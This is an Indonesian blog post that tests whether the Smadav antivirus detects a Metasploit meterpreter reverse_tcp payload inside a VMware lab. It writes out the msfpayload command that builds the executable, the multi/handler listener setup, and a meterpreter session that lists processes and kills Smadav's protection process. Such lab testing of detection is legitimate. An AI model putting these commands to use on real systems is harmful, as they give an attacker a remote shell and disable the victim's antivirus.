Exploitasi memang meresahkan, apalagi yang namanya payload. Bicara masalah payload nih, payload itu sebuah shell code yang terbungkus amplop (esktensi) yang mampu melakukan eksploitasi system. Cara ampuh untuk mencegah kejadian exploitation adalah dengan menggunakan antivirus.
Pada kesempatan ini, saya akan mencoba mengetes seberapa baik Smadav (Anti Virus Lokal) bekerja. Ini adalah pride fighting (pertarungan harga diri)
Di dini saya memiliki VMware sebagai virtual machine saya untuk mengetest seberapa jauh kehebatan smadav dalam bekerja. MEngapa saya menggunakan VMware? Karena VMware dapat melakukan copy-paste dari host ke VMware dengan metode drag and drop. Tidak seperti Virtual Box. Hal ini mempermudah saya untuk mengirimkan file exploit ke target untuk selanjutnya di scan oleh antivirus setempat (smadav).
Dimulai dari membuat file exploit dengan perintah
root@red-dragon:~# msfpayload windows/meterpreter/reverse_tcp LHOST=10.21.0.234 LPORT=4444 X > /root/Desktop/exploit.exe
Saya taruh di desktop supaya mudah drag and drop nya =D
Kemudian menaruh file exploit ke komputer target. Dan saya scan file tersebut dengan smadav. Antivirus yang baik mampu membaca file tersebut sebagai virus, mengingat file ini berfungsi layaknya virus trojan horse.
Hasilnya mngejutkan.
Smadav tidak dapat membaca file tersebut sebagai virus. Padahal smadav sudah saya update!!!
Lalu apa yang terjadi jika saya jalankan file ini?
Sebelumnya saya telah menyiapkan exploit multi/handler dengan perintah
msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 10.21.0.234
LHOST => 10.21.0.234
msf exploit(handler) > set LPORT 4444
LPORT => 4444
msf exploit(handler) > exploit -j
Pada msfconsole
Dan setelah file exploit.exe di run, ini yang akan terjadi
Batapa berbahayanya jika ini terjadi. Anda bisa melihat post sebelumnya tentang messing with meterpreter pada blog ini.
Contoh, saya akan mencoba mengakhiri proses smadav
meterpreter > ps
Process list
============
PID Name Arch Session User Path
--- ---- ---- ------- ---- ----
0 [System Process]
1016 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\System32\svchost.exe
1076 svchost.exe x86 0 C:\WINDOWS\system32\svchost.exe
1124 TPAutoConnSvc.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\VMware\VMware Tools\TPAutoConnSvc.exe
1128 svchost.exe x86 0 C:\WINDOWS\system32\svchost.exe
1420 spoolsv.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\spoolsv.exe
1444 alg.exe x86 0 C:\WINDOWS\System32\alg.exe
1564 exploit.exe x86 0 ROOT-11E5DB48A8\Administrator C:\Documents and Settings\Administrator\Desktop\exploit.exe
1584 explorer.exe x86 0 ROOT-11E5DB48A8\Administrator C:\WINDOWS\Explorer.EXE
1676 VMwareTray.exe x86 0 ROOT-11E5DB48A8\Administrator C:\Program Files\VMware\VMware Tools\VMwareTray.exe
1684 vmtoolsd.exe x86 0 ROOT-11E5DB48A8\Administrator C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
1692 rundll32.exe x86 0 ROOT-11E5DB48A8\Administrator C:\WINDOWS\system32\rundll32.exe
1700 SM?RTP.exe x86 0 ROOT-11E5DB48A8\Administrator C:\Program Files\Smadav\SM?RTP.exe
1940 svchost.exe x86 0 C:\WINDOWS\system32\svchost.exe
1972 TPAutoConnect.exe x86 0 ROOT-11E5DB48A8\Administrator C:\Program Files\VMware\VMware Tools\TPAutoConnect.exe
316 vmtoolsd.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
4 System x86 0
536 wuauclt.exe x86 0 ROOT-11E5DB48A8\Administrator C:\WINDOWS\system32\wuauclt.exe
560 smss.exe x86 0 NT AUTHORITY\SYSTEM \SystemRoot\System32\smss.exe
608 csrss.exe x86 0 NT AUTHORITY\SYSTEM \??\C:\WINDOWS\system32\csrss.exe
632 winlogon.exe x86 0 NT AUTHORITY\SYSTEM \??\C:\WINDOWS\system32\winlogon.exe
676 services.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\services.exe
688 lsass.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\lsass.exe
844 vmacthlp.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\VMware\VMware Tools\vmacthlp.exe
860 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\svchost.exe
924 svchost.exe x86 0 C:\WINDOWS\system32\svchost.exe
984 wscntfy.exe x86 0 ROOT-11E5DB48A8\Administrator C:\WINDOWS\system32\wscntfy.exe
meterpreter > kill 1700
Killing: 1700
meterpreter >
Perhatikan tray icon pada windows!!!
Sebelum
Sesudah [SMADAV telah TERBUNUH oleh meterpreter]
Jadi apa kesimpulannya?
Anda sendiri yang menentukan.
Nice Om.., Serem Juga tuh AV./., :)
BalasHapus